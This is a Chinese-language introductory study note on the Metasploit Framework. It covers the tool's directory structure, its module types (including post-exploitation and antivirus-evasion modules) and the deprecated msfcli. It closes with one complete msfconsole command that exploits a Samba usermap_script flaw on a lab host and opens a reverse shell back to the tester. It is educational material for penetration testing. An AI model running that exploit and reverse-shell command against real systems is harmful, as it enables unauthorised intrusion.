简介
msf全称Metasploit Framework
,是一款功能强大的开源渗透测试工具,它提供了丰富的漏洞利用模块、扫描工具、Payload生成器和框架等功能。MSF最初由HD Moore于2003年创建,现在由Rapid7维护和发展。
因为msf是一个框架,所以可以根据自己的需求进行功能开发。
本学习基本来自官网教程----https://www.offsec.com/metasploit-unleashed/filesystem-and-libraries/。
但是官网是英语,学习还是比较费劲的(英语lower的我)。
详解
msf体系图
msf在kali目录
主目录在\usr\share\metasploit-framework
data
目录包含Metasploit用于存储某些漏洞利用、单词列表、图像等所需的二进制文件的可编辑文件documentation
目录包含框架的可用文档lib
目录包含框架代码库的核心代码modules
目录中,您可以找到用于漏洞利用的实际MSF模块、辅助模块和后期模块、有效载荷、编码器和nop生成器。也是最主要的模块,是接下来重点学习的部分plugins
目录存储着msf的插件scripts
目录存储着脚本文件tools
目录中有各种有用的命令行实用程序
modules模块
modules既上文提到的modules目录。包含了很多模块,这些模块是msf最主要最常用的功能,基本上包含了整个渗透流程所需工具。
一共有七个模块,分别是Exploits
,Auxiliary
,Payloads
,Encoders
,Nops
,Post
,Evasion
。
- Exploits,包含了很多漏洞的exp
- Auxiliary,是个辅助模块,主要用来信息收集,包括端口扫描仪、模糊器、嗅探器等
- Payloads,包含了很多漏洞的payload
- Encoders,编码模块,可以用来大多数的编码解码
- Nops,空操作模块,用于填充数据,以维持有效负载结构的完整性
- Post,后渗透模块,用于在目标系统上执行各种后渗透操作,如收集敏感信息、提权、横向移动等
- Evasion,免杀模块,用于生成一些免杀木马
msfcli
msfcli是早期的msf命令行接口,可以通过此接口来使用一些msf功能模块。
在2015-06-18
后被弃用,可以使用msfconsole -x
来替代,例如:
root@kali:~# msfconsole -x "use exploit/multi/samba/usermap_script;\
set RHOST 172.16.194.172;\
set PAYLOAD cmd/unix/reverse;\
set LHOST 172.16.194.163;\
run"